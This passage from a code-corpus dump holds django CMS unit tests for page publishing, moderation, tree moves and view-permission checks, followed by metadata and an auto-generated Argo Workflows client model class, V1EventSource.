self._add_plugin(self.user_super, page=self.slave_page)
def test_master_can_add_plugin(self):
self._add_plugin(self.user_master, page=self.slave_page)
def test_slave_can_add_plugin(self):
self._add_plugin(self.user_slave, page=self.slave_page)
def test_same_order(self):
# create 4 pages
slugs = []
for i in range(0, 4):
page = create_page("page", "nav_playground.html", "en",
parent=self.home_page)
slug = page.title_set.drafts()[0].slug
slugs.append(slug)
# approve last 2 pages in reverse order
for slug in reversed(slugs[2:]):
page = self.assertObjectExist(Page.objects.drafts(), title_set__slug=slug)
page = publish_page(page, self.user_master, 'en')
self.check_published_page_attributes(page)
def test_create_copy_publish(self):
# create new page to copy
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page)
# copy it under home page...
# TODO: Use page.copy_page here
with self.login_user_context(self.user_master):
copied_page = self.copy_page(page, self.home_page)
page = publish_page(copied_page, self.user_master, 'en')
self.check_published_page_attributes(page)
def test_create_publish_copy(self):
# create new page to copy
page = create_page("page", "nav_playground.html", "en",
parent=self.home_page)
page = publish_page(page, self.user_master, 'en')
# copy it under master page...
# TODO: Use page.copy_page here
with self.login_user_context(self.user_master):
copied_page = self.copy_page(page, self.master_page)
self.check_published_page_attributes(page)
copied_page = publish_page(copied_page, self.user_master, 'en')
self.check_published_page_attributes(copied_page)
def test_subtree_needs_approval(self):
# create page under slave_page
page = create_page("parent", "nav_playground.html", "en",
parent=self.home_page)
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en", parent=page)
self.assertFalse(subpage.publisher_public)
# publish both of them in reverse order
subpage = publish_page(subpage, self.user_master, 'en')
# subpage should not be published, because parent is not published
# yet, should be marked as `publish when parent`
self.assertFalse(subpage.publisher_public)
        # publish page (parent of subpage), so subpage must be published also
page = publish_page(page, self.user_master, 'en')
self.assertNotEqual(page.publisher_public, None)
# reload subpage, it was probably changed
subpage = self.reload(subpage)
# parent was published, so subpage must be also published..
self.assertNotEqual(subpage.publisher_public, None)
#check attributes
self.check_published_page_attributes(page)
self.check_published_page_attributes(subpage)
def test_subtree_with_super(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en",
parent=page)
self.assertFalse(subpage.publisher_public)
# tree id must be the same
self.assertEqual(page.path[0:4], subpage.path[0:4])
# publish both of them
page = self.reload(page)
page = publish_page(page, self.user_super, 'en')
        # reload subpage, there was a path change
subpage = self.reload(subpage)
self.assertEqual(page.path[0:4], subpage.path[0:4])
subpage = publish_page(subpage, self.user_super, 'en')
# tree id must stay the same
self.assertEqual(page.path[0:4], subpage.path[0:4])
# published pages must also have the same root-path
self.assertEqual(page.publisher_public.path[0:4], subpage.publisher_public.path[0:4])
#check attributes
self.check_published_page_attributes(page)
self.check_published_page_attributes(subpage)
def test_super_add_page_to_root(self):
"""Create page which is not under moderation in root, and check if
some properties are correct.
"""
# create page under root
page = create_page("page", "nav_playground.html", "en")
# public must not exist
self.assertFalse(page.publisher_public)
def test_moderator_flags(self):
"""Add page under slave_home and check its flag
"""
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page)
# No public version
self.assertIsNone(page.publisher_public)
self.assertFalse(page.publisher_public_id)
# check publish box
page = publish_page(page, self.user_slave, 'en')
# public page must not exist because of parent
self.assertFalse(page.publisher_public)
# waiting for parents
self.assertEqual(page.get_publisher_state('en'), PUBLISHER_STATE_PENDING)
# publish slave page
self.slave_page = self.slave_page.reload()
slave_page = publish_page(self.slave_page, self.user_master, 'en')
self.assertFalse(page.publisher_public)
self.assertTrue(slave_page.publisher_public)
def test_plugins_get_published(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
placeholder = page.placeholders.all()[0]
add_plugin(placeholder, "TextPlugin", "en", body="test")
# public must not exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
publish_page(page, self.user_super, 'en')
self.assertEqual(CMSPlugin.objects.all().count(), 2)
def test_remove_plugin_page_under_moderation(self):
# login as slave and create page
page = create_page("page", "nav_playground.html", "en", parent=self.slave_page)
# add plugin
placeholder = page.placeholders.all()[0]
plugin = add_plugin(placeholder, "TextPlugin", "en", body="test")
# publish page
page = self.reload(page)
page = publish_page(page, self.user_slave, 'en')
# only the draft plugin should exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
# page should require approval
self.assertEqual(page.get_publisher_state('en'), PUBLISHER_STATE_PENDING)
# master approves and publishes the page
# first approve slave-home
slave_page = self.reload(self.slave_page)
publish_page(slave_page, self.user_master, 'en')
page = self.reload(page)
page = publish_page(page, self.user_master, 'en')
# draft and public plugins should now exist
self.assertEqual(CMSPlugin.objects.all().count(), 2)
# login as slave and delete the plugin - should require moderation
with self.login_user_context(self.user_slave):
plugin_data = {
'plugin_id': plugin.pk
}
remove_url = URL_CMS_PLUGIN_REMOVE + "%s/" % plugin.pk
response = self.client.post(remove_url, plugin_data)
self.assertEqual(response.status_code, 302)
# there should only be a public plugin - since the draft has been deleted
self.assertEqual(CMSPlugin.objects.all().count(), 1)
page = self.reload(page)
# login as super user and approve/publish the page
publish_page(page, self.user_super, 'en')
# there should now be 0 plugins
self.assertEqual(CMSPlugin.objects.all().count(), 0)
def test_superuser_can_view(self):
url = self.page_b.get_absolute_url(language='en')
with self.login_user_context(self.user_super):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_staff_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
        # verify that user_staff has no view permission for this page
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_staff:
has_perm = True
self.assertEqual(has_perm, False)
login_ok = self.client.login(username=getattr(self.user_staff, get_user_model().USERNAME_FIELD),
password=getattr(self.user_staff, get_user_model().USERNAME_FIELD))
self.assertTrue(login_ok)
# really logged in
self.assertTrue('_auth_user_id' in self.client.session)
login_user_id = self.client.session.get('_auth_user_id')
user = get_user_model().objects.get(pk=self.user_staff.pk)
self.assertEqual(str(login_user_id), str(user.id))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_normal_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
        # verify that user_normal has access to this page
normal_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_normal:
normal_has_perm = True
self.assertTrue(normal_has_perm)
with self.login_user_context(self.user_normal):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
        # verify that user_non_global has no access to this page
non_global_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_non_global:
non_global_has_perm = True
self.assertFalse(non_global_has_perm)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# non logged in user
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_globalpermission(self):
# Global user
user_global = self._create_user("global")
with self.login_user_context(self.user_super):
user_global = create_page_user(user_global, user_global)
user_global.is_staff = False
user_global.save() # Prevent is_staff permission
global_page = create_page("global", "nav_playground.html", "en",
published=True)
# Removed call since global page user doesn't have publish permission
#global_page = publish_page(global_page, user_global)
# it's allowed for the normal user to view the page
assign_user_to_page(global_page, user_global,
global_permission=True, can_view=True)
url = global_page.get_absolute_url('en')
all_view_perms = PagePermission.objects.filter(can_view=True)
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == user_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=user_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, True)
# user_global
with self.login_user_context(user_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
# self.non_user_global
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == self.user_non_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=self.user_non_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, False)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_all(self):
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR='all'):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_none(self):
# default of when to show pages to anonymous user doesn't take
# global permissions into account
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR=None):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
@override_settings(CMS_PERMISSION=True)
class PatricksMoveTest(CMSTestCase):
"""
    Fixtures contain 3 users, 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
            - created by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish/moderate this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
def setUp(self):
# create super user
self.user_super = self._create_user("super", True, True)
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create master user
self.user_master = self._create_user("master", True)
self.user_master.user_permissions.add(Permission.objects.get(codename='publish_page'))
#self.user_master = create_page_user(self.user_super, master, grant_all=True)
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "nav_playground.html", "en",
parent=self.master_page, created_by=self.user_super)
slave = self._create_user("slave", True)
self.user_slave = create_page_user(self.user_super, slave, can_add_page=True,
can_change_page=True, can_delete_page=True)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
with self.login_user_context(self.user_slave):
# all of them are under moderation...
self.pa = create_page("pa", "nav_playground.html", "en", parent=self.slave_page)
self.pb = create_page("pb", "nav_playground.html", "en", parent=self.pa, position="right")
self.pc = create_page("pc", "nav_playground.html", "en", parent=self.pb, position="right")
self.pd = create_page("pd", "nav_playground.html", "en", parent=self.pb)
self.pe = create_page("pe", "nav_playground.html", "en", parent=self.pd, position="right")
self.pf = create_page("pf", "nav_playground.html", "en", parent=self.pe)
self.pg = create_page("pg", "nav_playground.html", "en", parent=self.pf, position="right")
self.ph = create_page("ph", "nav_playground.html", "en", parent=self.pf, position="right")
self.assertFalse(self.pg.publisher_public)
# login as master for approval
self.slave_page = self.slave_page.reload()
publish_page(self.slave_page, self.user_master, 'en')
# publish and approve them all
publish_page(self.pa, self.user_master, 'en')
publish_page(self.pb, self.user_master, 'en')
publish_page(self.pc, self.user_master, 'en')
publish_page(self.pd, self.user_master, 'en')
publish_page(self.pe, self.user_master, 'en')
publish_page(self.pf, self.user_master, 'en')
publish_page(self.pg, self.user_master, 'en')
publish_page(self.ph, self.user_master, 'en')
self.reload_pages()
def reload_pages(self):
self.pa = self.pa.reload()
self.pb = self.pb.reload()
self.pc = self.pc.reload()
self.pd = self.pd.reload()
self.pe = self.pe.reload()
self.pf = self.pf.reload()
self.pg = self.pg.reload()
self.ph = self.ph.reload()
def test_patricks_move(self):
"""
Tests permmod when moving trees of pages.
1. build following tree (master node is approved and published)
slave-home
/ | \
A B C
/ \
D E
/ | \
F G H
2. perform move operations:
1. move G under C
2. move E under G
slave-home
/ | \
A B C
/ \
D G
\
E
/ \
F H
3. approve nodes in following order:
1. approve H
2. approve G
3. approve E
4. approve F
"""
# TODO: this takes 5 seconds to run on my MBP. That's TOO LONG!
self.assertEqual(self.pg.parent_id, self.pe.pk)
self.assertEqual(self.pg.publisher_public.parent_id, self.pe.publisher_public_id)
# perform moves under slave...
self.move_page(self.pg, self.pc)
self.reload_pages()
# Draft page is now under PC
self.assertEqual(self.pg.parent_id, self.pc.pk)
# Public page is under PC
self.assertEqual(self.pg.publisher_public.parent_id, self.pc.publisher_public_id)
self.assertEqual(self.pg.publisher_public.parent.get_absolute_url(),
self.pc.publisher_public.get_absolute_url())
self.assertEqual(self.pg.get_absolute_url(), self.pg.publisher_public.get_absolute_url())
self.move_page(self.pe, self.pg)
self.reload_pages()
self.assertEqual(self.pe.parent_id, self.pg.pk)
self.assertEqual(self.pe.publisher_public.parent_id, self.pg.publisher_public_id)
self.ph = self.ph.reload()
# check urls - they should stay be the same now after the move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
self.pg.get_absolute_url()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
self.ph.get_absolute_url()
)
# public parent check after move
self.assertEqual(self.pg.publisher_public.parent.pk, self.pc.publisher_public_id)
self.assertEqual(self.pe.publisher_public.parent.pk, self.pg.publisher_public_id)
self.assertEqual(self.ph.publisher_public.parent.pk, self.pe.publisher_public_id)
# check if urls are correct after move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/' % self.get_pages_root()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/pe/ph/' % self.get_pages_root()
)
class ModeratorSwitchCommandTest(CMSTestCase):
def test_switch_moderator_on(self):
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
with disable_logger(log):
call_command('cms', 'moderator', 'on')
with force_language("en"):
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(path)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
def test_table_name_patching(self):
"""
This tests the plugin models patching when publishing from the command line
"""
self.get_superuser()
create_page("The page!", "nav_playground.html", "en", published=True)
draft = Page.objects.drafts()[0]
draft.reverse_id = 'a_test' # we have to change *something*
draft.save()
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
draft.publish('en')
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
# Manually undoing table name patching
Text._meta.db_table = 'djangocms_text_ckeditor_text'
plugin_pool.patched = False
with disable_logger(log):
call_command('cms', 'moderator', 'on')
# Sanity check the database (we should have one draft and one public)
not_drafts = len(Page.objects.filter(publisher_is_draft=False))
drafts = len(Page.objects.filter(publisher_is_draft=True))
self.assertEqual(not_drafts, 1)
self.assertEqual(drafts, 1)
def test_switch_moderator_off(self):
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(path)
self.assertIsNotNone(page2)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
def tearDown(self):
plugin_pool.patched = False
plugin_pool.set_plugin_meta()
class ViewPermissionBaseTests(CMSTestCase):
def setUp(self):
self.page = create_page('testpage', 'nav_playground.html', 'en')
def get_request(self, user=None):
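        # minimal stand-in for an HttpRequest: only the attributes the permission
        # checks actually read (user, GET/POST/REQUEST data and the session)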
attrs = {
'user': user or AnonymousUser(),
'REQUEST': {},
'POST': {},
'GET': {},
'session': {},
}
return type('Request', (object,), attrs)
@override_settings(
CMS_PERMISSION=False,
CMS_PUBLIC_FOR='staff',
)
class BasicViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to false, as this is the
normal use case
"""
@override_settings(CMS_PUBLIC_FOR="all")
def test_unauth_public(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[])
@override_settings(CMS_PUBLIC_FOR="all")
def test_staff_public_all(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
def test_staff_public_staff(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
@override_settings(CMS_PUBLIC_FOR="none")
def test_staff_basic_auth(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
@override_settings(CMS_PUBLIC_FOR="none")
def test_normal_basic_auth(self):
request = self.get_request(self.get_standard_user())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='none'
)
class UnrestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True but no restrictions
apply to this specific page
"""
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(1):
"""
The query is:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[])
def test_global_access(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(2):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
GlobalPagePermission query for the page site
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
def test_normal_denied(self):
request = self.get_request(self.get_standard_user())
with self.assertNumQueries(4):
"""
The queries are:
PagePermission query for the affected page (is the page restricted?)
GlobalPagePermission query for the page site
User permissions query
Content type query
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='all'
)
class RestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True and view restrictions
apply to this specific page
"""
def setUp(self):
super(RestrictedViewPermissionTests, self).setUp()
self.group = Group.objects.create(name='testgroup')
self.pages = [self.page]
self.expected = [self.page.pk]
PagePermission.objects.create(page=self.page, group=self.group, can_view=True, grant_on=ACCESS_PAGE)
def test_unauthed(self):
request = self.get_request()
with self.assertNumQueries(1):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
[])
def test_page_permissions(self):
user = self.get_standard_user()
request = self.get_request(user)
PagePermission.objects.create(can_view=True, user=user, page=self.page, grant_on=ACCESS_PAGE)
with self.assertNumQueries(3):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
PagePermission query for this user
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
def test_page_group_permissions(self):
user = self.get_standard_user()
user.groups.add(self.group)
request = self.get_request(user)
with self.assertNumQueries(3):
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
def test_global_permission(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(2):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
def test_basic_perm_denied(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(5):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
PagePermission query for this user
Generic django permission lookup
content type lookup by permission lookup
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
[])
def test_basic_perm(self):
user = self.get_standard_user()
user.user_permissions.add(Permission.objects.get(codename='view_page'))
request = self.get_request(user)
with self.assertNumQueries(5):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
PagePermission query for this user
Generic django permission lookup
content type lookup by permission lookup
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
class PublicViewPermissionTests(RestrictedViewPermissionTests):
""" Run the same tests as before, but on the public page instead. """
def setUp(self):
super(PublicViewPermissionTests, self).setUp()
self.page.publish('en')
self.pages = [self.page.publisher_public]
self.expected = [self.page.publisher_public_id]
class GlobalPermissionTests(CMSTestCase):
def test_sanity_check(self):
""" Because we have a new manager, we'll do some basic checks."""
# manager is still named the same.
self.assertTrue(hasattr(GlobalPagePermission, 'objects'))
self.assertEqual(0, GlobalPagePermission.objects.all().count())
# we are correctly inheriting from BasicPagePermissionManager
self.assertTrue(hasattr(GlobalPagePermission.objects, 'with_user'))
        # If we're using the new manager, we have extra methods which check for
        # access to this specific site OR to all sites.
        self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_permission'))
        # these are just convenience methods for the above.
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_add_permission'))
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_change_permission'))
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_view_permission'))
def test_emulate_admin_index(self):
""" Call methods that emulate the adminsite instance's index.
This test was basically the reason for the new manager, in light of the
problem highlighted in ticket #1120, which asserts that giving a user
no site-specific rights when creating a GlobalPagePermission should
allow access to all sites.
"""
# create and then ignore this user.
superuser = self._create_user("super", is_staff=True, is_active=True,
is_superuser=True)
superuser.set_password("super")
superuser.save()
# create 2 staff users
SITES = [
Site.objects.get(pk=1),
Site.objects.create(domain='example2.com', name='example2.com'),
]
USERS = [
self._create_user("staff", is_staff=True, is_active=True),
self._create_user("staff_2", is_staff=True, is_active=True),
]
for user in USERS:
user.set_password('staff')
# re-use the same methods the UserPage form does.
# Note that it internally calls .save(), as we've not done so.
save_permissions({
'can_add_page': True,
'can_change_page': True,
'can_delete_page': False
}, user)
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False, user=USERS[0])
# we're querying here to ensure that even though we've created two users
# above, we should have successfully filtered to just one perm.
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[0]).count())
# this will confirm explicit permissions still work, by adding the first
# site instance to the many2many relationship 'sites'
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False,
user=USERS[1]).sites.add(SITES[0])
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[1]).count())
homepage = create_page(title="master", template="nav_playground.html",
language="en", in_navigation=True, slug='/')
publish_page(page=homepage, user=superuser, language='en')
with self.settings(CMS_PERMISSION=True):
# for all users, they should have access to site 1
request = RequestFactory().get(path='/', data={'site__exact': 1})
# we need a session attribute for current_site(request), which is
# used by has_page_add_permission and has_page_change_permission
request.session = {}
for user in USERS:
# has_page_add_permission and has_page_change_permission both test
# for this explicitly, to see if it's a superuser.
request.user = user
# Note, the query count is inflated by doing additional lookups
# because there's a site param in the request.
with self.assertNumQueries(FuzzyInt(6, 7)):
# PageAdmin swaps out the methods called for permissions
# if the setting is true, it makes use of cms.utils.permissions
self.assertTrue(has_page_add_permission(request))
self.assertTrue(has_page_change_permission(request))
# internally this calls PageAdmin.has_[add|change|delete]_permission()
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
# can't use the above loop for this test, as we're testing that
# user 1 has access, but user 2 does not, as they are only assigned
# to site 1
request = RequestFactory().get('/', data={'site__exact': 2})
request.session = {}
# As before, the query count is inflated by doing additional lookups
# because there's a site param in the request
with self.assertNumQueries(FuzzyInt(11, 20)):
# this user shouldn't have access to site 2
request.user = USERS[1]
self.assertTrue(not has_page_add_permission(request))
self.assertTrue(not has_page_change_permission(request))
self.assertEqual({'add': False, 'change': False, 'delete': False},
site._registry[Page].get_model_perms(request))
# but, going back to the first user, they should.
request = RequestFactory().get('/', data={'site__exact': 2})
request.user = USERS[0]
self.assertTrue(has_page_add_permission(request))
self.assertTrue(has_page_change_permission(request))
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
def test_has_page_add_permission_with_target(self):
page = create_page('Test', 'nav_playground.html', 'en')
user = self._create_user('user')
request = RequestFactory().get('/', data={'target': page.pk})
request.session = {}
request.user = user
has_perm = has_page_add_permission(request)
self.assertFalse(has_perm)
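# Editor's note: the view-restriction pattern exercised by RestrictedViewPermissionTests
# above, as it would be applied outside the tests (group name and objects illustrative):
#
#     group = Group.objects.create(name='translators')
#     PagePermission.objects.create(page=page, group=group, can_view=True,
#                                   grant_on=ACCESS_PAGE)
#     user.groups.add(group)   # members of the group can now view `page`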
| 42.204452
| 268
| 0.623745
|
c233b2022d684678db25849bbf7a0f042c12bafb
| 4,234
|
py
|
Python
|
argo/workflows/client/models/v1_event_source.py
|
argentumcode/argo-client-python
|
31c1519056379d3f046d4b522f37af87243fdbb4
|
[
"Apache-2.0"
] | null | null | null |
argo/workflows/client/models/v1_event_source.py
|
argentumcode/argo-client-python
|
31c1519056379d3f046d4b522f37af87243fdbb4
|
[
"Apache-2.0"
] | null | null | null |
argo/workflows/client/models/v1_event_source.py
|
argentumcode/argo-client-python
|
31c1519056379d3f046d4b522f37af87243fdbb4
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Argo Server API
You can get examples of requests and responses by using the CLI with `--gloglevel=9`, e.g. `argo list --gloglevel=9` # noqa: E501
The version of the OpenAPI document: v3.0.4
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argo.workflows.client.configuration import Configuration
class V1EventSource(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'component': 'str',
'host': 'str'
}
attribute_map = {
'component': 'component',
'host': 'host'
}
def __init__(self, component=None, host=None, local_vars_configuration=None): # noqa: E501
"""V1EventSource - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._component = None
self._host = None
self.discriminator = None
if component is not None:
self.component = component
if host is not None:
self.host = host
@property
def component(self):
"""Gets the component of this V1EventSource. # noqa: E501
Component from which the event is generated. # noqa: E501
:return: The component of this V1EventSource. # noqa: E501
:rtype: str
"""
return self._component
@component.setter
def component(self, component):
"""Sets the component of this V1EventSource.
Component from which the event is generated. # noqa: E501
:param component: The component of this V1EventSource. # noqa: E501
:type: str
"""
self._component = component
@property
def host(self):
"""Gets the host of this V1EventSource. # noqa: E501
Node name on which the event is generated. # noqa: E501
:return: The host of this V1EventSource. # noqa: E501
:rtype: str
"""
return self._host
@host.setter
def host(self, host):
"""Sets the host of this V1EventSource.
Node name on which the event is generated. # noqa: E501
:param host: The host of this V1EventSource. # noqa: E501
:type: str
"""
self._host = host
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1EventSource):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1EventSource):
return True
return self.to_dict() != other.to_dict()
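# --- Editor's illustrative usage (not part of the generated client code) ---
# A minimal round trip through the model defined above; the field values below
# are hypothetical. The guard keeps the demo out of normal imports.
if __name__ == "__main__":
    src = V1EventSource(component="kubelet", host="node-1")
    # to_dict() walks openapi_types, so both declared fields appear in the result.
    assert src.to_dict() == {"component": "kubelet", "host": "node-1"}
    # __eq__ / __ne__ compare the to_dict() representations.
    assert src == V1EventSource(component="kubelet", host="node-1")
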